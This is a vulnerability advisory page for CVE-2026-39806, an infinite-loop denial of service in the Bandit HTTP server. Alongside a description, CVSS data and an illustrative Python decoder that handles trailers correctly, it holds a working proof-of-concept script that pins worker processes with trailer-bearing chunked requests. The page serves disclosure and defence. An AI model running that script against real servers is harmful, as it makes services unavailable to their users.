Security Vulnerability Report
CVE-2026-39806 CVSS 7.5 HIGH

CVE-2026-39806

Published: 2026-05-13 14:17:36
Last Modified: 2026-05-21 15:23:09
Source: 6b3ad84c-e1a6-4bf7-a703-f496b71e49db

Description

Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in mtrudel bandit allows unauthenticated remote denial of service via worker process exhaustion.

'Elixir.Bandit.HTTP1.Socket':do_read_chunked_data!/5 in lib/bandit/http1/socket.ex terminates only when the last-chunk line 0\r\n is followed immediately by the empty trailer line \r\n. RFC 9112 §7.1.2 permits zero or more trailer fields between them. When trailers are present, none of the match clauses fit: the catch-all arm computes a negative to_read, calls read_available!/2, receives <<>> on timeout, and tail-recurses with unchanged state. The worker process is pinned for the lifetime of the TCP connection.

A handful of concurrent connections sending RFC-conformant chunked requests with trailer fields is sufficient to exhaust the Bandit worker pool and render the server unresponsive to all further traffic. No authentication, special headers, or large payload is required. Proxies such as NGINX and HAProxy legitimately forward trailer-bearing requests, so servers behind such proxies may be affected without any malicious client involvement.

This issue affects bandit: from 1.6.1 before 1.11.1.
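The decoder the description faults exits only when 0\r\n is immediately followed by \r\n, and on the trailer path it re-reads with unchanged state after an empty read. As an added illustration for this page (not Bandit's code; the names decode_chunked, decode_from_reads, NeedMoreData and ChunkedError and the sample byte strings are constructed here), the following Python decoder consumes the trailer section exactly as RFC 9112 §7.1.2 allows, and treats an empty read while the body is still incomplete as a hard error rather than looping:

```python
"""Chunked-body decoder that accepts trailer fields (RFC 9112 §7.1.2).

Added illustration for this page, not Bandit's code. It models the two
points in the description: the last chunk "0\\r\\n" may be followed by zero
or more trailer field lines before the terminating "\\r\\n", and a reader
that gets no data back must fail rather than recurse with unchanged state.
"""
from __future__ import annotations

CRLF = b"\r\n"
HEXDIGITS = frozenset(b"0123456789abcdefABCDEF")


class NeedMoreData(Exception):
    """Buffer ends before the chunked body is complete; read more and retry."""


class ChunkedError(ValueError):
    """Malformed chunked framing, or a peer that stopped sending mid-body."""


def _read_line(buf: bytes, pos: int) -> tuple[bytes, int]:
    """Return (line without CRLF, position after CRLF) or raise NeedMoreData."""
    end = buf.find(CRLF, pos)
    if end < 0:
        raise NeedMoreData
    return buf[pos:end], end + 2


def decode_chunked(buf: bytes, max_trailers: int = 32) -> tuple[bytes, dict[str, str], int]:
    """Decode one chunked body from the start of buf.

    Returns (body, trailers, bytes_consumed). Raises NeedMoreData when buf
    is a prefix of a valid body and ChunkedError when it is malformed.
    """
    body = bytearray()
    pos = 0
    while True:
        size_line, pos = _read_line(buf, pos)
        size_field = size_line.split(b";", 1)[0].strip()  # drop any chunk-ext
        if not size_field or any(c not in HEXDIGITS for c in size_field):
            raise ChunkedError(f"bad chunk size {size_field!r}")
        size = int(size_field, 16)
        if size == 0:
            break  # last-chunk: a trailer section follows, possibly empty
        if len(buf) < pos + size + 2:
            raise NeedMoreData
        if buf[pos + size:pos + size + 2] != CRLF:
            raise ChunkedError("chunk data not terminated by CRLF")
        body += buf[pos:pos + size]
        pos += size + 2

    # trailer-section = *( field-line CRLF ), then the empty line that ends
    # the message. This loop covers the case the vulnerable exit condition
    # did not: zero OR MORE trailer lines between "0\r\n" and "\r\n".
    trailers: dict[str, str] = {}
    while True:
        line, pos = _read_line(buf, pos)
        if line == b"":
            return bytes(body), trailers, pos
        if len(trailers) >= max_trailers:
            raise ChunkedError("too many trailer fields")
        name, sep, value = line.partition(b":")
        if not sep or not name.strip():
            raise ChunkedError(f"malformed trailer line {line!r}")
        try:
            key = name.strip().decode("ascii").lower()
        except UnicodeDecodeError:
            raise ChunkedError(f"non-ASCII trailer name {name!r}") from None
        trailers[key] = value.strip().decode("latin-1")


def decode_from_reads(reads, max_body: int = 1 << 20) -> tuple[bytes, dict[str, str]]:
    """Drive decode_chunked over successive socket reads.

    reads yields what each recv() returned; b"" means timeout or EOF. An
    empty read while the body is still incomplete is a hard error here, so a
    worker cannot be pinned by a peer that simply stops sending.
    """
    buf = b""
    for data in reads:
        if not data:
            raise ChunkedError("no data before body complete")
        buf += data
        if len(buf) > max_body:
            raise ChunkedError("chunked body exceeds limit")
        try:
            body, trailers, _ = decode_chunked(buf)
            return body, trailers
        except NeedMoreData:
            continue  # progress was made (buf grew); wait for the next read
    raise ChunkedError("reads exhausted before body complete")


if __name__ == "__main__":
    # Constructed sample: the trailer-bearing shape the description discusses.
    with_trailer = b"5\r\nhello\r\n0\r\nX-Checksum: abc\r\n\r\n"
    print(decode_chunked(with_trailer))  # (b'hello', {'x-checksum': 'abc'}, 32)
    print(decode_chunked(b"0\r\n\r\n"))  # (b'', {}, 5)
    reads = [b"5\r\nhel", b"lo\r\n0\r\n", b"X-Checksum: abc\r\n\r\n"]
    print(decode_from_reads(iter(reads)))  # (b'hello', {'x-checksum': 'abc'})
```

The two guards worth noting are the bounded trailer loop (max_trailers) and the refusal in decode_from_reads to retry after an empty read: together they ensure every iteration either consumes input or terminates the request, which is the property the vulnerable catch-all arm lacked.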

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CVSS 4.0 (CNA, secondary): 8.7 HIGH, CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
Weakness: CWE-835

Configurations (Affected Products)

cpe:2.3:a:mtrudel:bandit:*:*:*:*:*:*:*:* - VULNERABLE
Bandit >= 1.6.1, < 1.11.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket
import time

def send_exploit(target_host, target_port):
    # Construct a HTTP/1.1 request with chunked encoding and a trailer.
    # This triggers the infinite loop in Bandit < 1.11.1.
    payload = (
        "POST / HTTP/1.1\r\n"
        f"Host: {target_host}\r\n"
        "Transfer-Encoding: chunked\r\n"
        "\r\n"
        "5\r\n"
        "hello\r\n"
        "0\r\n"  # Last chunk marker
        "X-Malicious-Header: value\r\n"  # The trailer that causes the bug
        "\r\n"  # Final CRLF
    )
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_host, target_port))
        s.send(payload.encode())
        print(f"[+] Exploit sent to {target_host}:{target_port}. Worker pinned.")
        # Keep the connection open to hold the worker process
        while True:
            time.sleep(1)
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    TARGET_HOST = "127.0.0.1"
    TARGET_PORT = 4000
    # Launch multiple concurrent connections to exhaust the worker pool
    for _ in range(10):
        send_exploit(TARGET_HOST, TARGET_PORT)

References

https://cna.erlef.org/cves/CVE-2026-39806.html (Third Party Advisory)
https://github.com/mtrudel/bandit/commit/ae3520dfdbfab115c638f8c7f6f6b805db34e1ab (Patch)
https://github.com/mtrudel/bandit/security/advisories/GHSA-rf5q-vwxw-gmrf (Exploit, Vendor Advisory)
https://osv.dev/vulnerability/EEF-CVE-2026-39806 (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39806", "sourceIdentifier": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db", "published": "2026-05-13T14:17:35.700", "lastModified": "2026-05-21T15:23:08.653", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in mtrudel bandit allows unauthenticated remote denial of service via worker process exhaustion.\n\n'Elixir.Bandit.HTTP1.Socket':do_read_chunked_data!/5 in lib/bandit/http1/socket.ex terminates only when the last-chunk line 0\\r\\n is followed immediately by the empty trailer line \\r\\n. RFC 9112 §7.1.2 permits zero or more trailer fields between them. When trailers are present, none of the match clauses fit: the catch-all arm computes a negative to_read, calls read_available!/2, receives <<>> on timeout, and tail-recurses with unchanged state. The worker process is pinned for the lifetime of the TCP connection.\n\nA handful of concurrent connections sending RFC-conformant chunked requests with trailer fields is sufficient to exhaust the Bandit worker pool and render the server unresponsive to all further traffic. No authentication, special headers, or large payload is required. 
Proxies such as NGINX and HAProxy legitimately forward trailer-bearing requests, so servers behind such proxies may be affected without any malicious client involvement.\n\nThis issue affects bandit: from 1.6.1 before 1.11.1."}], "metrics": {"cvssMetricV40": [{"source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": 
"HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-835"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mtrudel:bandit:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.6.1", "versionEndExcluding": "1.11.1", "matchCriteriaId": "4C7F13C2-7993-4309-BCAE-8548A08F9D5E"}]}]}], "references": [{"url": "https://cna.erlef.org/cves/CVE-2026-39806.html", "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/mtrudel/bandit/commit/ae3520dfdbfab115c638f8c7f6f6b805db34e1ab", "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db", "tags": ["Patch"]}, {"url": "https://github.com/mtrudel/bandit/security/advisories/GHSA-rf5q-vwxw-gmrf", "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://osv.dev/vulnerability/EEF-CVE-2026-39806", "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/mtrudel/bandit/security/advisories/GHSA-rf5q-vwxw-gmrf", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}